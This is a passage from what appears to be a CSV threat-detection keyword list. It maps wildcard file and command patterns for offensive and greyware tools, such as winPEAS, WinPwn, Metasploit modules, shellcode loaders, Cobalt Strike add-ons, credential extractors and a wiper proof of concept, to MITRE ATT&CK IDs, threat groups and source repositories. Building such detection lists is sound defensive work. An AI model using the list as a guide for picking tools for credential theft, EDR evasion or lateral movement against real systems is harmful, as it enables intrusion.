All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*winexec.notepad.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*WinhttpShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
+"*WinhttpShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*Win-Ops-Master.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Winpayloads*","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","10","1517","361","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z" +"*winPEAS.bat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEAS.bat*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*WinPEAS.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*winPEAS.ps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*winPEASany.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASany.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASany_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASany_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS-Obfuscated*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - 
TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx64.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASx64.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx64_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx86.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASx86.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - 
T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx86_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEASx86_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*Win-PS2EXE.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*WinPwn -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwn.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwnage*","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2498","388","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" +"*winpwnage.functions*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*winreconstreamline.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" 
+"*winregistry.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*WinRing0*WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*winrm_command_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*winrm_script_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*winrmdll *","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","0","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*winrmdll.*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*winrs -r:*whoami*","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*WinSCPPasswdExtractor*","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","1","8","0","2023-07-01T17:27:32Z","2022-12-20T11:55:55Z" +"*WinShellcode.git*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,, +"*WinShellcode-main*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - 
T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,, +"*Winsocky-main*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*WINspect.ps1*","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Information Gathering","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","6","568","116","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z" +"*win-x64-DynamicKernelWinExecCalc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*Wiper POC tool that wipes a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*WiperPoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*WiperPoc\WiperPoc*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*wireghoul/htshells*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*wireless/captures.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless/cracker.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless/pmkid.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless/sniper.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wireless_attack_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*wirelesskeyview.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wirelesskeyview.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential 
Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*WirelessKeyView_x64.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wirelesskeyview-no-command-line.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wirelesskeyview-x64.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Wireshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & 